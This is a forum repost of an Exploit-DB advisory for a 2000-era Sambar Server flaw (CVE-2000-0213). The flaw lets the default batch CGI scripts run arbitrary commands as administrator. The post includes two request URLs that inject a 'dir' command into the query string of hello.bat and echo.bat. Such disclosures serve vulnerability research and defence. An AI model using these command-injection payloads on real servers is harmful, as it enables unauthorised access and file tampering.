Exploit Sambar Server 4.2 Beta 7 - Batch CGI

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19761
Проверка EDB
  1. Пройдено
Автор
GEORICH CHORBADZHIYSKI
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2000-0213
Дата публикации
2000-02-24
Sambar Server 4.2 Beta 7 - Batch CGI
Код:
source: https://www.securityfocus.com/bid/1002/info

The Sambar Web/FTP/Proxy Server for Windows NT and 2000 supports DOS-style batch programs as CGI scripts. A remote attacker can use any batch file used by the server in the 'cgi-bin' directory to run any valid command-line program with administrator privileges. This allows the attacker to read, modify, create, or delete any file or directory on the system, including user accounts, etc. Even if the user hasn't enabled or created any batch files, the software ships with two by default: 'hello.bat' and 'echo.bat'.

http://target/cgi-bin/hello.bat?&dir+c:or
http://target/cgi-bin/echo.bat?&dir+c:\
 
Источник
www.exploit-db.com

Похожие темы